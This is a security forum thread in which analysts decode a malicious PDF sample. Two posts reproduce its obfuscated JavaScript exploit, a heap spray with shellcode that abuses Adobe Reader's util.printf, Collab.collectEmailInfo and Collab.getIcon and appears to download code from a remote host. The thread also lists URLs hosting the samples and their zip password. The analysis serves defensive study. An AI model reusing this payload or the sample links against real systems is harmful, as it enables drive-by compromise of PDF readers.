Author Topic: PDF Failed to decode  (Read 9789 times)

0 Members and 1 Guest are viewing this topic.

December 19, 2009, 09:03:11 am
Read 9789 times

Garlando

  • Full Member

  • Offline
  • ***

  • 40
I tried with PDFTK and PDF-PARSER.PY

and both fails, i get this on PDF-PARSER

'ASCIIHexDecode decompress failed'



December 19, 2009, 09:21:39 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Please don't attach malware unprotected !!!! Please use a password protected zip file next time.


I came across this sample too today. It can be found at
Code: [Select]
kijojg.net/fr/files/leerydumbbunny.pdf
I'm not aware of any tool that is able to decode the stream.

A second sample is here
Code: [Select]
kijojg.net/fr/files/scamtodosomething.pdf
password : infected
Ruining the bad guy's day

December 19, 2009, 09:33:43 am
Reply #2

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip



ps. first time really coding in python which is prolly why my code is crap :D

December 22, 2009, 04:47:50 pm
Reply #3

origami

  • Newbie

  • Offline
  • *

  • 3
    • origami in PDF
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami

http://security-labs.org/origami - PDF parsing|forging tool

December 22, 2009, 04:52:34 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami



Files are attached in the 2nd message of this topic. Direct link to attachment is:

http://www.malwaredomainlist.com/forums/index.php?action=dlattach;topic=3626.0;attach=539
Ruining the bad guy's day

December 22, 2009, 06:50:07 pm
Reply #5

origami

  • Newbie

  • Offline
  • *

  • 3
    • origami in PDF
oups, thank u :)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/leerydumbbunny.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/leerydumbbunny.pdf :
--------------------------------------------------------------------------------
../../parser/stream.rb:299:in `decodedata': Error while decoding stream 4 0 R (Origami::InvalidStream)
   -> [Origami::Filter::InvalidLZWData] LZW table is full and no clear flag was set

Good a bug to fix ;)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/scamtodosomething.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/scamtodosomething.pdf :
--------------------------------------------------------------------------------
eval(unescape("%76%61%72%20%6D%65%6D%6F%72%79...)

Better, no bug to fix :-D
http://security-labs.org/origami - PDF parsing|forging tool

January 06, 2010, 09:33:26 am
Reply #6

malware

  • Newbie

  • Offline
  • *

  • 1
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip



ps. first time really coding in python which is prolly why my code is crap :D


I have used the same samples provided, how come I cannot have the same result? I have installed phyton. Removed the /RunLengthDecode filter.

Usage: pdf-parser.py [option] {sample file}

Is this correct?

January 06, 2010, 01:09:49 pm
Reply #7

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
I still had to add a decoder for the LZWDecode filter, a basic one is listed in the version of pdf-parser I list in my other post.